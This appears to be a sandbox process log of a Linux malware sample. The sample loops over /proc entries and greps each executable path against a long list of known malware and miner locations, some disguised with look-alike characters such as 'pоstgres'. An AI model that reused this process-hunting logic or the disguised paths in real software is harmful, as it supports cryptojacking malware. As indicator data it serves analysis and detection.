/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1044
-
-
/bin/grepgrep exe2⤵PID:1048
-
-
/bin/lsls -latrh /proc/712⤵PID:1047
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1050
-
-
/bin/grepgrep exe2⤵PID:1054
-
-
/bin/lsls -latrh /proc/7102⤵PID:1053
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1057
-
-
/bin/grepgrep exe2⤵PID:1060
-
-
/bin/lsls -latrh /proc/7152⤵PID:1059
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1063
-
-
/bin/grepgrep exe2⤵PID:1067
-
-
/bin/lsls -latrh /proc/722⤵PID:1066
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1071
-
-
/bin/grepgrep exe2⤵PID:1074
-
-
/bin/lsls -latrh /proc/7252⤵PID:1073
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1076
-
-
/bin/grepgrep exe2⤵PID:1080
-
-
/bin/lsls -latrh /proc/732⤵PID:1079
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1082
-
-
/bin/grepgrep exe2⤵PID:1085
-
-
/bin/lsls -latrh /proc/742⤵PID:1084
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1087
-
-
/bin/grepgrep exe2⤵PID:1090
-
-
/bin/lsls -latrh /proc/752⤵PID:1089
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1092
-
-
/bin/grepgrep exe2⤵PID:1095
-
-
/bin/lsls -latrh /proc/762⤵PID:1094
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1097
-
-
/bin/grepgrep exe2⤵PID:1100
-
-
/bin/lsls -latrh /proc/772⤵PID:1099
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1102
-
-
/bin/grepgrep exe2⤵PID:1105
-
-
/bin/lsls -latrh /proc/782⤵PID:1104
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/82⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/grepgrep exe2⤵PID:1115
-
-
/bin/lsls -latrh /proc/802⤵PID:1114
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1117
-
-
/bin/grepgrep exe2⤵PID:1120
-
-
/bin/lsls -latrh /proc/812⤵PID:1119
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1122
-
-
/bin/grepgrep exe2⤵PID:1125
-
-
/bin/lsls -latrh /proc/92⤵PID:1124
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1127
-
-
/bin/grepgrep exe2⤵PID:1130
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1129
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1132
-
-
/bin/grepgrep exe2⤵PID:1135
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1134
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1137
-
-
/bin/grepgrep exe2⤵PID:1140
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1139
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1142
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1144
-
-
/bin/grepgrep exe2⤵PID:1145
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1147
-
-
/bin/grepgrep exe2⤵PID:1150
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1149
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1152
-
-
/bin/grepgrep exe2⤵PID:1155
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1154
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1157
-
-
/bin/grepgrep exe2⤵PID:1160
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1159
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1162
-
-
/bin/grepgrep exe2⤵PID:1165
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1164
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1167
-
-
/bin/grepgrep exe2⤵PID:1170
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1169
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1172
-
-
/bin/grepgrep exe2⤵PID:1175
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1174
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1177
-
-
/bin/grepgrep exe2⤵PID:1180
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1179
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1182
-
-
/bin/grepgrep exe2⤵PID:1185
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1184
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1187
-
-
/bin/grepgrep exe2⤵PID:1190
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1189
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1192
-
-
/bin/grepgrep exe2⤵PID:1195
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1194
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1197
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1199
-
-
/bin/grepgrep exe2⤵PID:1200
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1202
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1204
-
-
/bin/grepgrep exe2⤵PID:1205
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1207
-
-
/bin/grepgrep exe2⤵PID:1212
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1211
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1214
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1220
-
-
/bin/grepgrep exe2⤵PID:1221
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1224
-
-
/bin/grepgrep exe2⤵PID:1227
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1226
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1230
-
-
/bin/grepgrep exe2⤵PID:1234
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1233
-
-
